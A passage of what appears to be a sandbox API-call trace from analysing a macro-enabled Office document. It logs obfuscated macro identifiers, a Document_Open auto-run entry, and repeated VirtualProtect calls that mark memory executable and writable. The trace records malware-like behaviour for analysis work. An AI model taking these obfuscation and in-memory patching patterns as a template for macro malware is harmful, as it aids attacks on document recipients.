dwFlags=0x30001) returned 0x2 [0104.142] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0104.148] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197c5c | out: ppsaOut=0x197c5c) returned 0x0 [0104.148] SafeArrayAllocData (psa=0xc846530) returned 0x0 [0104.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.152] CRetailMalloc_Alloc () returned 0xc823040 [0104.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc823040, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x97\x96\x97\x96\x96\x97\x97\x96\x97\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97\x97\x97\x96\x96\x96\x97\x97\x97\x96\x96\x97\x96\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x96\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x97\x96\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x96\x97\x96\x96\x97\x96\x97\x97\x96\x96\x96\x96\x97\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x97\x96\x96\x97\x97\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x97\x96\x97\x97\x97\x96\x96\x96\x96\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.152] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x96\x97\x96\x96\x96\x97\x97\x97\x97\x96\x96\x96\x97\x97\x97\x96\x96\x97\x96\x96\x96\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x96\x97\x97\x96\x96\x97\x97\x96\x97\x97\x97\x96\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x97\x97\x96\x96\x96\x97\x97\x97\x96\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x96\x96\x96\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97\x96\x97\x97\x96\x96\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="R3AfI9", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x96\x96\x96\x97\x96\x97\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="Document_Open", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x97\x97\x96\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0104.153] CRetailMalloc_Free () returned 0x1 [0104.153] longjmp () [0104.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.153] CRetailMalloc_Alloc () returned 0xc8234a0 [0104.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc8234a0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0104.153] CRetailMalloc_Free () returned 0x1 [0104.153] longjmp () [0104.646] SafeArrayDestroyData (psa=0xc846530) returned 0x0 [0104.646] SafeArrayDestroyDescriptor (psa=0xc846530) returned 0x0 [0104.647] GetAsyncKeyState (vKey=3) returned 0 [0104.754] CRetailMalloc_Alloc () returned 0xcbdd9e0 [0104.754] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.754] memcpy (in: _Dst=0xaf5270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0104.754] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.755] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.755] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x97\x97\x97\x96\x96\x96", cchCount2=-1) returned 1 [0104.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52df2, cbMultiByte=27, lpWideCharStr=0x1976c4, cchWideChar=28 | out: lpWideCharStr="———–——————–––––——––————–––") returned 27 [0104.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32f52, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="———–——————–––––——––————–––") returned 27 [0104.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32f52, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="———–——————–––––——––————–––") returned 27 [0104.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32f52, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="———–——————–––––——––————–––") returned 27 [0104.755] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x96\x97\x97\x96\x96\x97\x97\x97\x97\x96\x96\x96", cchCount2=-1) returned 1 [0104.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c32f52, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="———–——————–––––——––————–––") returned 27 [0104.756] CRetailMalloc_Alloc () returned 0xc847e10 [0104.756] _mbscpy_s (in: _Dst=0xc847e10, _DstSizeInBytes=0x1b, _Src=0x9c32f52 | out: _Dst=0xc847e10) returned 0x0 [0104.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10b16, cbMultiByte=34, lpWideCharStr=0x197734, cchWideChar=35 | out: lpWideCharStr="_B_var_———–——————–––––——––————–––") returned 34 [0104.756] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x1b, _Src=0x9c32f52 | out: _Dst=0x19779c) returned 0x0 [0104.756] CRetailMalloc_Free () returned 0x1 [0104.756] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0104.756] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.756] memcpy (in: _Dst=0xaf516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0104.756] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.756] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.756] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.756] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0104.757] memcpy (in: _Dst=0xcbdda58, _Src=0x197944, _Size=0x18 | out: _Dst=0xcbdda58) returned 0xcbdda58 [0104.757] CRetailMalloc_Realloc () returned 0xcbdd9e0 [0104.757] CRetailMalloc_Free () returned 0x1 [0104.757] GetCurrentProcess () returned 0xffffffff [0104.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0104.757] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.758] GetCurrentProcess () returned 0xffffffff [0104.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0104.758] GetCurrentProcess () returned 0xffffffff [0104.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0104.758] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.758] GetCurrentProcess () returned 0xffffffff [0104.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0104.758] GetCurrentProcess () returned 0xffffffff [0104.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0104.758] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.759] GetCurrentProcess () returned 0xffffffff [0104.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0104.759] GetCurrentProcess () returned 0xffffffff [0104.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0104.759] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.759] GetCurrentProcess () returned 0xffffffff [0104.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0104.759] GetCurrentProcess () returned 0xffffffff [0104.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0104.759] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.760] GetCurrentProcess () returned 0xffffffff [0104.760] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0104.760] GetCurrentProcess () returned 0xffffffff [0104.760] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0104.760] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.760] GetCurrentProcess () returned 0xffffffff [0104.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0104.853] GetCurrentProcess () returned 0xffffffff [0104.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0104.853] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.940] GetCurrentProcess () returned 0xffffffff [0104.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0104.940] GetCurrentProcess () returned 0xffffffff [0104.940] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0104.940] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.941] GetCurrentProcess () returned 0xffffffff [0104.941] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0104.941] GetCurrentProcess () returned 0xffffffff [0104.941] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0104.941] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.941] GetCurrentProcess () returned 0xffffffff [0104.941] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0104.941] GetCurrentProcess () returned 0xffffffff [0104.941] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0104.941] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.942] GetCurrentProcess () returned 0xffffffff [0104.942] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0104.943] GetCurrentProcess () returned 0xffffffff [0104.943] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0104.943] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.943] GetCurrentProcess () returned 0xffffffff [0104.943] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0104.943] GetCurrentProcess () returned 0xffffffff [0104.943] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0104.943] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.944] GetCurrentProcess () returned 0xffffffff [0104.944] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0104.944] GetCurrentProcess () returned 0xffffffff [0104.944] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0104.944] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.945] GetCurrentProcess () returned 0xffffffff [0104.945] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0104.945] GetCurrentProcess () returned 0xffffffff [0104.945] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0104.945] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.945] GetCurrentProcess () returned 0xffffffff [0104.945] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0104.945] GetCurrentProcess () returned 0xffffffff [0104.945] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0104.945] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.946] GetCurrentProcess () returned 0xffffffff [0104.946] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0104.946] GetCurrentProcess () returned 0xffffffff [0104.946] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0104.946] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.947] GetCurrentProcess () returned 0xffffffff [0104.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0104.947] GetCurrentProcess () returned 0xffffffff [0104.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0104.947] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.947] GetCurrentProcess () returned 0xffffffff [0104.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0104.947] GetCurrentProcess () returned 0xffffffff [0104.947] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0104.947] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.949] GetCurrentProcess () returned 0xffffffff [0104.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0104.949] GetCurrentProcess () returned 0xffffffff [0104.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0104.949] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.949] GetCurrentProcess () returned 0xffffffff [0104.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0104.949] GetCurrentProcess () returned 0xffffffff [0104.949] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0104.949] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.950] GetCurrentProcess () returned 0xffffffff [0104.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0104.950] GetCurrentProcess () returned 0xffffffff [0104.950] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0104.950] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.951] GetCurrentProcess () returned 0xffffffff [0104.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0104.951] GetCurrentProcess () returned 0xffffffff [0104.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0104.951] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.951] GetCurrentProcess () returned 0xffffffff [0104.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0104.951] GetCurrentProcess () returned 0xffffffff [0104.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0104.951] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.952] GetCurrentProcess () returned 0xffffffff [0104.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0104.952] GetCurrentProcess () returned 0xffffffff [0104.952] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0104.952] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.953] GetCurrentProcess () returned 0xffffffff [0104.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0104.953] GetCurrentProcess () returned 0xffffffff [0104.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0104.953] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.953] GetCurrentProcess () returned 0xffffffff [0104.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0104.953] GetCurrentProcess () returned 0xffffffff [0104.953] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0104.953] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.954] GetCurrentProcess () returned 0xffffffff [0104.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0104.954] GetCurrentProcess () returned 0xffffffff [0104.954] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0104.954] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0104.955] GetCurrentProcess () returned 0xffffffff [0104.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0104.955] GetCurrentProcess () returned 0xffffffff [0104.955] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0104.955] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, 